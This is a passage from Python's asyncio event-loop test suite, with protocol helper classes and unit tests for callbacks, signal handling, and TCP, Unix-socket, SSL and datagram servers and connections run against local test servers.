self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
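# Mixin holding the bulk of the event-loop tests; concrete test classes mix it
# in and provide create_event_loop().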
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
        self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
